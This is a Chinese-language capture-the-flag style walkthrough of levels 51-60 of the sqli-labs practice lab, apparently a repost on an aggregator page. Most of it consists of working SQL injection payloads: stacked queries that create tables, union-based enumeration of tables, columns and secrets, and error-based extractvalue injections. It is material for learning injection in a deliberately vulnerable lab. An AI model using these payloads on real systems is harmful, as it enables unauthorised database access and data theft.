zoukankan      html  css  js  c++  java
  • sql-lib闯关秘籍之51-60关

    下面开始11-20关,之前不会的关卡可以参考我这几篇文章: sql-lib闯关秘籍之1-10关sql-lib闯关秘籍之11-20关sql-lib闯关秘籍之21-30关, sql-lib闯关秘籍之31-40关 ,sql-lib闯关秘籍之41-50关

    不管是第几关,我们的最终目标是获得用户密码,从而获取最高权限!

    以下的学习过程中如果遇到那里不会的或者不清楚的地方,欢迎大家留言,我将尽力帮助大家~

     第五十一关

    这一关和三十八关基本一样 ,堆叠注入问题  只不过是字符型                  ?sort=1';create table test51 like users;%23

     看数据库发现有啦

     第五十二关

    和五十关一样,只不过不显示错误
    ?sort=1;create table test52 like users;%23

    堆叠注入

     

     第五十三关

    和五十一关一样,区别是不显示错误

    ?sort=1';create table test53 like users;%23

     

     第五十四关

    这一关没什么特别  特别在于查询的次数 ,只能输入10次注入信息,记录方式是cookie。 

    查库  ?id=-1%27%20union%20select%201,database(),%273

     查表     ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

     爆列      ?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='i58u96bgqr(后面这关name是咱们刚才查到的)

     爆数据        ?id=-1' union select 1,group_concat(secret_6KHN),3 from i58u96bgqr%23(爆咱刚才查到的一张表的数据)

    将我们刚才获得的输入得到这个

     第五十五关

    和上一关一样,加了一个小括号 通过测试发现是加了小括号,一共可以输入14次

     查表        ?id=-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23(和上一关一样就是把引号改成括号了,是吧)

     第五十六关

    和之前一样,通过测试发现是单引号括号闭合,其他的操作一样,我就不截图了

    看数据库名      ?id=-1') union select 1,database(),3%23

     第五十七关

    经过测试,发现是双引号闭合,其他和前几关一样

     查询数据库名                ?id=-1" union select 1,database(),3%23(基本一样不再截图)

     第五十八关

    我发现这机关的颜色搭配挺好看哈,这关好像只有5次机会啊。。。

     

     后来发现没有回显,一查,这一关不能用union select语句了,那我们报错试一下

     报错输入获得数据库名                   ?id=0' and extractvalue(1, concat(0x5c, (select database())))%23

     那就说明报错说明可以的,报错注入在之前的文章有介绍,不在这里在做解释

     第五十九关

    和上一关一样只不过没有单引号

     报错输入获得数据库名                   ?id=0 and extractvalue(1, concat(0x5c, (select database())))%23

     第六十关

    和上一关一样,只不过多了双引号和括号?id=0”)

     报错输入获得数据库名                  ?id=0") and extractvalue(1, concat(0x5c, (select database())))%23

     获取表名      ?id=0") union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+

     爆列名      ?id=-1") union select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='wapsbffje5'),0x7e))--+

     爆数据      ?id=-1") union select extractvalue(1,concat(0x7e,(select group_concat(secret_XSR5) from wapsbffje5),0x7e))--+

     输入进去        RsPZ518K3ZvXCVOvrGbhuqAZ  你搞定了他

     哈哈哈哈哈,结束了60关了

    51-60关结束

    该文章有参考了以下的网页:

    SQL注入靶场sqli-labs 1-65关全部通关教程

    SQLi_Labs通关文档【1-65关】

     sqli-labs 1-65教程

  • 相关阅读:
    eclipse恢复界面默认设置
    文件夹的拷贝
    文件的输入输出
    十进制转二进制,八进制,十六进制(查表法)
    数组元素的查找(折半查找)
    C++几个小函数
    C++ 内部排序(一)
    C++实现链表
    C++输出IP地址段内的合法地址
    我看软件工程师的职业规划
  • 原文地址:https://www.cnblogs.com/longshisan/p/12237918.html
Copyright © 2011-2022 走看看